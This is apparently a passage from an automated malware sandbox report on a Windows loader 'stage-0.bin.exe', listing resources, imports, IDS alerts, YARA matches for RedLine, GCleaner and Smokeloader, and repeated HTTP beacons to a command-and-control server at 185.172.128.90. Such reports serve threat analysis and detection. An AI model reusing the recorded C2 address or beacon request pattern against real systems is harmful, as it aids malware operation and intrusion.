                    RT_ICON0x50be00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.2816390041493776
                    RT_ICON0x531880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.3074577861163227
                    RT_ICON0x542300x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304RomanianRomania0.33647540983606555
                    RT_ICON0x54bb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.37322695035460995
                    RT_ICON0x550980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.494136460554371
                    RT_ICON0x55f400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.4693140794223827
                    RT_ICON0x567e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.43352601156069365
                    RT_ICON0x56d500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.27634854771784234
                    RT_ICON0x592f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.2861163227016886
                    RT_ICON0x5a3a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.30204918032786887
                    RT_ICON0x5ad280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.33599290780141844
                    RT_STRING0x60e500x456dataRomanianRomania0.4594594594594595
                    RT_STRING0x612a80x512dataRomanianRomania0.4406779661016949
                    RT_STRING0x617c00x414dataRomanianRomania0.45977011494252873
                    RT_STRING0x61bd80x598dataRomanianRomania0.44273743016759776
                    RT_STRING0x621700x4aadataRomanianRomania0.457286432160804
                    RT_STRING0x626200x29cdataRomanianRomania0.4865269461077844
                    RT_ACCELERATOR0x5d0300x48dataRomanianRomania0.8472222222222222
                    RT_GROUP_CURSOR0x5ed400x30data0.9375
                    RT_GROUP_CURSOR0x60a280x30data0.9375
                    RT_GROUP_CURSOR0x60c380x22data1.0588235294117647
                    RT_GROUP_ICON0x4e7f80x68dataRomanianRomania0.6826923076923077
                    RT_GROUP_ICON0x550200x76dataRomanianRomania0.6779661016949152
                    RT_GROUP_ICON0x5b1900x68dataRomanianRomania0.7115384615384616
                    RT_VERSION0x60c600x1f0MS Windows COFF PowerPC object file0.5362903225806451
                    DLLImport
                    KERNEL32.dllInterlockedIncrement, GetLogicalDriveStringsW, AddConsoleAliasW, GetModuleHandleW, GetTickCount, FindNextVolumeMountPointA, TlsSetValue, LoadLibraryW, SetCommConfig, AssignProcessToJobObject, WriteConsoleW, GetModuleFileNameW, CreateJobObjectA, InterlockedExchange, GetLastError, GetProcAddress, VirtualAlloc, SetVolumeLabelW, SetComputerNameExA, OpenMutexA, OpenWaitableTimerW, LocalAlloc, MoveFileA, GetNumberFormatW, RemoveDirectoryW, GlobalFindAtomW, EnumResourceTypesW, GetConsoleTitleW, VirtualProtect, GetFileAttributesExW, GetCurrentProcessId, UnregisterWaitEx, DeleteFileA, GetVolumeInformationW, LoadLibraryA, GetSystemDefaultLangID, FlushFileBuffers, UnhandledExceptionFilter, SetUnhandledExceptionFilter, Sleep, ExitProcess, GetStartupInfoW, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapFree, TlsGetValue, TlsAlloc, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, RaiseException, HeapAlloc, HeapReAlloc, HeapSize, RtlUnwind, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle
                    USER32.dllGetMenu
                    GDI32.dllGetCharABCWidthsFloatW
                    WINHTTP.dllWinHttpSetOption
                    Language of compilation systemCountry where language is spokenMap
                    RomanianRomania
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-11-07T17:35:05.807851+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.653308185.172.128.9080TCP
                    2024-11-07T17:35:19.807581+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.649709185.172.128.9080TCP
                    2024-11-07T17:35:27.732600+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649758TCP
                    2024-11-07T17:35:33.312240+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.649752185.172.128.9080TCP
                    2024-11-07T17:35:46.820698+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.649813185.172.128.9080TCP
                    2024-11-07T17:35:55.246016+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.653298TCP
                    2024-11-07T17:36:00.443027+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.649828185.172.128.9080TCP
                    2024-11-07T17:36:13.937631+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.653300185.172.128.9080TCP
                    2024-11-07T17:36:27.445639+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.653301185.172.128.9080TCP
                    2024-11-07T17:36:40.958410+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.653304185.172.128.9080TCP
                    2024-11-07T17:36:54.449681+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.653305185.172.128.9080TCP
                    2024-11-07T17:37:07.954255+01002856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)1192.168.2.653307185.172.128.9080TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Nov 7, 2024 17:35:11.319230080 CET4970980192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:11.324541092 CET8049709185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:11.324861050 CET4970980192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:11.325412989 CET4970980192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:11.330576897 CET8049709185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:19.807385921 CET8049709185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:19.807580948 CET4970980192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:19.808077097 CET4970980192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:19.813244104 CET8049709185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:24.823981047 CET4975280192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:24.828850031 CET8049752185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:24.828950882 CET4975280192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:24.829231024 CET4975280192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:24.834613085 CET8049752185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:33.312139034 CET8049752185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:33.312239885 CET4975280192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:33.318391085 CET4975280192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:33.323286057 CET8049752185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:38.324135065 CET4981380192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:38.329207897 CET8049813185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:38.329376936 CET4981380192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:38.329468966 CET4981380192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:38.334393978 CET8049813185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:46.820544958 CET8049813185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:46.820698023 CET4981380192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:46.820970058 CET4981380192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:46.825894117 CET8049813185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:51.926984072 CET4982880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:51.931906939 CET8049828185.172.128.90192.168.2.6
                    Nov 7, 2024 17:35:51.931972027 CET4982880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:51.938896894 CET4982880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:35:51.943846941 CET8049828185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:00.442939043 CET8049828185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:00.443027020 CET4982880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:00.443121910 CET4982880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:00.448411942 CET8049828185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:05.449366093 CET5330080192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:05.454289913 CET8053300185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:05.454400063 CET5330080192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:05.454579115 CET5330080192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:05.459671021 CET8053300185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:13.937483072 CET8053300185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:13.937630892 CET5330080192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:13.944804907 CET5330080192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:13.949754953 CET8053300185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:18.949109077 CET5330180192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:18.954336882 CET8053301185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:18.954425097 CET5330180192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:18.954583883 CET5330180192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:18.959824085 CET8053301185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:27.445565939 CET8053301185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:27.445638895 CET5330180192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:27.445775986 CET5330180192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:27.450790882 CET8053301185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:32.450565100 CET5330480192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:32.455548048 CET8053304185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:32.455765009 CET5330480192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:32.455765009 CET5330480192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:32.460696936 CET8053304185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:40.958333015 CET8053304185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:40.958410025 CET5330480192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:40.958492041 CET5330480192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:40.963320017 CET8053304185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:45.964895964 CET5330580192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:45.969995975 CET8053305185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:45.970105886 CET5330580192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:45.971509933 CET5330580192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:45.976314068 CET8053305185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:54.449565887 CET8053305185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:54.449681044 CET5330580192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:54.449759960 CET5330580192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:54.457983971 CET8053305185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:59.464951992 CET5330780192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:59.469940901 CET8053307185.172.128.90192.168.2.6
                    Nov 7, 2024 17:36:59.470036030 CET5330780192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:59.470169067 CET5330780192.168.2.6185.172.128.90
                    Nov 7, 2024 17:36:59.475034952 CET8053307185.172.128.90192.168.2.6
                    Nov 7, 2024 17:37:07.954180002 CET8053307185.172.128.90192.168.2.6
                    Nov 7, 2024 17:37:07.954255104 CET5330780192.168.2.6185.172.128.90
                    Nov 7, 2024 17:37:07.954330921 CET5330780192.168.2.6185.172.128.90
                    Nov 7, 2024 17:37:07.959142923 CET8053307185.172.128.90192.168.2.6
                    Nov 7, 2024 17:37:12.966455936 CET5330880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:37:12.971438885 CET8053308185.172.128.90192.168.2.6
                    Nov 7, 2024 17:37:12.973639011 CET5330880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:37:12.973800898 CET5330880192.168.2.6185.172.128.90
                    Nov 7, 2024 17:37:12.978746891 CET8053308185.172.128.90192.168.2.6
                    TimestampSource PortDest PortSource IPDest IP
                    Nov 7, 2024 17:35:53.066246033 CET5352667162.159.36.2192.168.2.6
                    Nov 7, 2024 17:35:53.728171110 CET53497771.1.1.1192.168.2.6
                    • 185.172.128.90
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649709185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:35:11.325412989 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.649752185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:35:24.829231024 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.649813185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:35:38.329468966 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.649828185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:35:51.938896894 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.653300185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:36:05.454579115 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.653301185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:36:18.954583883 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.653304185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:36:32.455765009 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.653305185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:36:45.971509933 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.653307185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:36:59.470169067 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.653308185.172.128.90801484C:\Users\user\Desktop\stage-0.bin.exe
                    TimestampBytes transferredDirectionData
                    Nov 7, 2024 17:37:12.973800898 CET411OUTGET /cpa/ping.php?substr=one&s=two HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.172.128.90
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Click to jump to process

                    Click to jump to process

                    Target ID:0
                    Start time:11:35:08
                    Start date:07/11/2024
                    Path:C:\Users\user\Desktop\stage-0.bin.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\stage-0.bin.exe"
                    Imagebase:0x400000
                    File size:343'552 bytes
                    MD5 hash:8B7D2590F1FB0DFD81B796F4B4723542
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3375674668.00000000007BC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_GCleaner, Description: Yara detected GCleaner, Source: 00000000.00000002.3375447042.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GCleaner, Description: Yara detected GCleaner, Source: 00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_GCleaner, Description: Yara detected GCleaner, Source: 00000000.00000003.2129643395.0000000000740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >